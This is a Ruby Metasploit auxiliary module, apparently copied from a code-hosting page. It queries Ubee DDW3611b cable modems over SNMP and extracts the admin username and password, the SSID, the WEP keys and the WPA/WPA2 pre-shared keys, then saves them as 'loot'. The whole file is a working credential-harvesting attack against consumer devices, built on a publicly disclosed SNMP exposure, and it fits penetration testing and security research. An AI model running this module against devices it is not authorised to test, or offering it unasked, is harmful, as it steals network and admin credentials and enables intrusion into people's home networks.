160 lines
6.0 KiB
Ruby
160 lines
6.0 KiB
Ruby
#
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::SNMPClient
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'Ubee DDW3611b Cable Modem Wifi Enumeration',
|
|
'Description' => %q{
|
|
This module will extract WEP keys and WPA preshared keys from
|
|
certain Ubee cable modems.
|
|
},
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
|
|
],
|
|
'Author' => ['Deral "PercentX" Heiland'],
|
|
'License' => MSF_LICENSE
|
|
)
|
|
|
|
end
|
|
|
|
def run_host(ip)
|
|
output_data = {}
|
|
begin
|
|
snmp = connect_snmp
|
|
|
|
if snmp.get_value('1.2.840.10036.2.1.1.9.12') =~ /DDW3611/
|
|
print_good("#{ip}")
|
|
wifiinfo = ""
|
|
|
|
# System user account and Password
|
|
username = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0')
|
|
print_good("Username: #{username}")
|
|
wifiinfo << "Username: #{username}" << "\n"
|
|
password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
|
|
print_good("Password: #{password}")
|
|
wifiinfo << "Password: #{password}" << "\n"
|
|
|
|
wifistatus = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
|
|
if wifistatus == 1
|
|
ssid = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12')
|
|
print_good("SSID: #{ssid}")
|
|
wifiinfo << "SSID: #{ssid}" << "\n"
|
|
|
|
# Wifi Security Version
|
|
wifiversion = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.5.12')
|
|
if wifiversion == "0"
|
|
print_line("Open Access Wifi is Enabled")
|
|
|
|
# WEP enabled
|
|
elsif wifiversion == "1"
|
|
weptype = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.2.12')
|
|
if weptype == "2"
|
|
wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.1')
|
|
key1 = "#{wepkey1}".unpack('H*')
|
|
print_good("WEP KEY1: #{key1}")
|
|
wifiinfo << "WEP KEY1: #{key1}" << "\n"
|
|
wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.2')
|
|
key2 = "#{wepkey2}".unpack('H*')
|
|
print_good("WEP KEY2: #{key2}")
|
|
wifiinfo << "WEP KEY2: #{key2}" << "\n"
|
|
wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.3')
|
|
key3 = "#{wepkey3}".unpack('H*')
|
|
print_good("WEP KEY3: #{key3}")
|
|
wifiinfo << "WEP KEY3: #{key3}" << "\n"
|
|
wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.4')
|
|
key4 = "#{wepkey4}".unpack('H*')
|
|
print_good("WEP KEY4: #{key4}")
|
|
wifiinfo << "WEP KEY4: #{key4}" << "\n"
|
|
actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12')
|
|
print_good("Active Wep key is #{actkey}")
|
|
wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
|
|
|
|
elsif weptype == "1"
|
|
wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.1')
|
|
key1 = "#{wepkey1}".unpack('H*')
|
|
print_good("WEP KEY1: #{key1}")
|
|
wifiinfo << "WEP KEY1: #{key1}" << "\n"
|
|
wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.2')
|
|
key2 = "#{wepkey2}".unpack('H*')
|
|
print_good("WEP KEY2: #{key2}")
|
|
wifiinfo << "WEP KEY2: #{key2}" << "\n"
|
|
wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.3')
|
|
key3 = "#{wepkey3}".unpack('H*')
|
|
print_good("WEP KEY3: #{key3}")
|
|
wifiinfo << "WEP KEY3: #{key3}" << "\n"
|
|
wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.4')
|
|
key4 = "#{wepkey4}".unpack('H*')
|
|
print_good("WEP KEY4: #{key4}")
|
|
wifiinfo << "WEP KEY4: #{key4}" << "\n"
|
|
actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12')
|
|
print_good("Active Wep key is #{actkey}")
|
|
wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
|
|
|
|
else
|
|
print_line("FAILED")
|
|
end
|
|
|
|
# WPA enabled
|
|
elsif wifiversion == "2"
|
|
print_line("Device is configured for WPA ")
|
|
wpapsk = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12')
|
|
print_good("WPA PSK: #{wpapsk}")
|
|
wifiinfo << "WPA PSK: #{wpapsk}" << "\n"
|
|
|
|
# WPA2 enabled
|
|
elsif wifiversion == "3"
|
|
print_line("Device is configured for WPA2")
|
|
wpapsk2 = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12')
|
|
print_good("WPA2 PSK: #{wpapsk2}")
|
|
wifiinfo << "WPA PSK: #{wpapsk2}" << "\n"
|
|
|
|
# WPA Enterprise enabled
|
|
elsif wifiversion == "4"
|
|
print_line("Device is configured for WPA enterprise")
|
|
|
|
# WPA2 Enterprise enabled
|
|
elsif wifiversion == "5"
|
|
print_line("Device is configured for WPA2 enterprise")
|
|
|
|
# WEP 802.1x enabled
|
|
elsif wifiversion == "6"
|
|
print_line("Device is configured for WEP 802.1X")
|
|
|
|
else
|
|
print_line("FAILED")
|
|
end
|
|
|
|
else
|
|
print_line("WIFI is not enabled")
|
|
end
|
|
end
|
|
# Woot we got loot.
|
|
loot_name = "ubee_wifi"
|
|
loot_type = "text/plain"
|
|
loot_filename = "ubee_wifi.txt"
|
|
loot_desc = "Ubee Wifi configuration data"
|
|
p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc)
|
|
print_status("WIFI Data saved: #{p}")
|
|
|
|
rescue ::SNMP::UnsupportedVersion
|
|
rescue ::SNMP::RequestTimeout
|
|
rescue ::Interrupt
|
|
raise $!
|
|
rescue ::Exception => e
|
|
print_error("#{ip} - Error: #{e.class} #{e}")
|
|
disconnect_snmp
|
|
end
|
|
end
|
|
end
|